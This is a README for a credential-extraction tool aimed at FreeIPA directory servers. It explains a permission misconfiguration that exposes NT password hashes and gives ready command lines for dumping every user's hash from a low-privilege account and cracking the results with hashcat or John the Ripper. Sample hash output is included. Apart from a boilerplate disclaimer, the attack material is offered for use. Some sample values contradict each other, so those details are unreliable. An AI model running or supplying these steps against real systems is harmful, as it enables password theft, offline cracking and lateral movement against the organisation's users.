IPA NT Hash Extractor 🔐

A security tool for extracting NT password hashes from FreeIPA directory services. This tool demonstrates a critical security vulnerability that becomes possible due to specific FreeIPA permission configurations.

⚠️ DISCLAIMER

This tool is provided for educational and authorized security testing purposes only. The author is not responsible for any misuse of this software. Users are responsible for ensuring they have proper authorization before using this tool against any systems.

Root Cause: Permission Configuration Combination

This security flaw becomes possible due to the combination of two specific FreeIPA permission attributes:

1. ipaPermRight=read - Grants read access to user attributes
2. ipaDefaultAttr=ipanthash - Makes NT hashes accessible as default attributes

This combination allows to read NT password hashes from FreeIPA users.

Security Misconfiguration Overview

Any FreeIPA user can view the list of all users - this is a default behavior in FreeIPA directory services. The real vulnerability lies in the fact that NT password hashes are stored as base64-encoded values in the ipanthash attribute and can be extracted without any special privileges when this attribute is included in default readable attributes.

The extracted hashes require preprocessing - they are stored in base64 format and need to be decoded to hex format for use with password cracking tools like Hashcat or John the Ripper.

Security Impact

• Password Hash Exposure: NT hashes can be extracted and cracked offline
• Lateral Movement: Compromised hashes enable pass-the-hash attacks
• Privilege Escalation: Weak passwords can lead to account compromise
• Domain Compromise: Multiple weak hashes can lead to domain-wide access

🛠️ Tool Overview

ipaNThashExtractor.py (Main Tool)

• Status: ✅ Primary extraction tool
• Dependencies: python-freeipa library
• Features:
  • Direct FreeIPA API integration
  • Support for single user extraction (--user)
  • Extract all users by default or with --dump-all
  • Multiple output formats (Hashcat, John, Raw)
  • Automatic base64 to hex conversion
  • Detailed logging and statistics
  • SSL verification disabled by default (use --verify-ssl to enable)
• Usage: python3 ipaNThashExtractor.py --help

📦 Installation

Prerequisites

• Python 3.6+
• python-freeipa & urllib3

Install Dependencies

pip install -r requirements.txt

🚀 Quick Start

Command Line Arguments

python3 ipaNThashExtractor.py [OPTIONS]

Required Arguments:
  --ipadc IPADC         FreeIPA server address
  --username USERNAME   Username for authentication
  --password PASSWORD   Password for authentication

Optional Arguments:
  --user USERNAME_TO_DUMP       Extract hash for specific user
  --dump-all            Extract hashes for all users
  --output FILE         Output file (default: ipa_nt_hashes.txt)
  --format FORMAT       Output format: hashcat, john, raw (default: hashcat)
  --verify-ssl          Enable SSL certificate verification (disabled by default)
  --verbose, -v         Verbose logging

1. Extract All Users (Default)

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password --dump-all

2. Extract Hash for Specific User

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password --user admin

3. Custom Output Format (raw, john or hashcat)

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password --output hashes.txt --format hashcat

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password --output hashes.txt --format john

python3 ipaNThashExtractor.py --ipadc dc1.legion.realm --username admin --password your_password --output hashes.txt --format raw

📊 Output Formats

Hashcat Format (for Hashcat)

admin:500:aad3b435b51404eeaad3b435b51404ee:aea80d657cf69686bed84bdaaa8a904a:::
caesar:500:aad3b435b51404eeaad3b435b51404ee:9364cc260da23924f5f95f10b5131e93:::

John Format (for John the Ripper)

admin:$NT$aea80d657cf69686bed84bdaaa8a904a
caesar:$NT$9364cc260da23924f5f95f10b5131e93

Raw Format (Base64 as extracted from FreeIPA)

ruiNVlz2lobr2EvKqoqKkA==
k2TMJg2qI5JPX5XxCxE+kQ==

🔧 Tool Integration

Hashcat (Mode 1000 - NTLM)

hashcat -m 1000 ipa_nt_hashes.txt wordlist.txt

John the Ripper

john ipa_nt_hashes.txt --wordlist=wordlist.txt

Example Output

Here's an example of the ipaNThashExtractor.py script successfully extracting and converting hashes:

Key Features Demonstrated:

• ✅ Authentication with limited privileges (attacker_readipanthash)
• ✅ Processing of 18 users total
• ✅ Extraction of 6 NT hashes successfully
• ✅ Multiple output formats (NTLM shown)
• ✅ Hashcat integration example
• ✅ Detailed logging and progress tracking
• ✅ Success confirmation with statistics

Successful Hash Extraction

============================================================
NT HASH EXTRACTION SUMMARY
============================================================
Users with NT hashes: 6

Users with NT hashes:
  - admin:
    Base64 (as extracted): rqgNZXz2loa+2EvaqoqQSg==
    Hex (converted):       aea80d657cf69686bed84bdaaa8a904a
  - admin2:
    Base64 (as extracted): rqgNZXz2loa+2EvaqoqQSg==
    Hex (converted):       aea80d657cf69686bed84bdaaa8a904a
  - attacker_readipanthash:
    Base64 (as extracted): rqgNZXz2loa+2EvaqoqQSg==
    Hex (converted):       aea80d657cf69686bed84bdaaa8a904a
============================================================

📄 License

This project is provided for educational purposes. Use responsibly and only on authorized systems.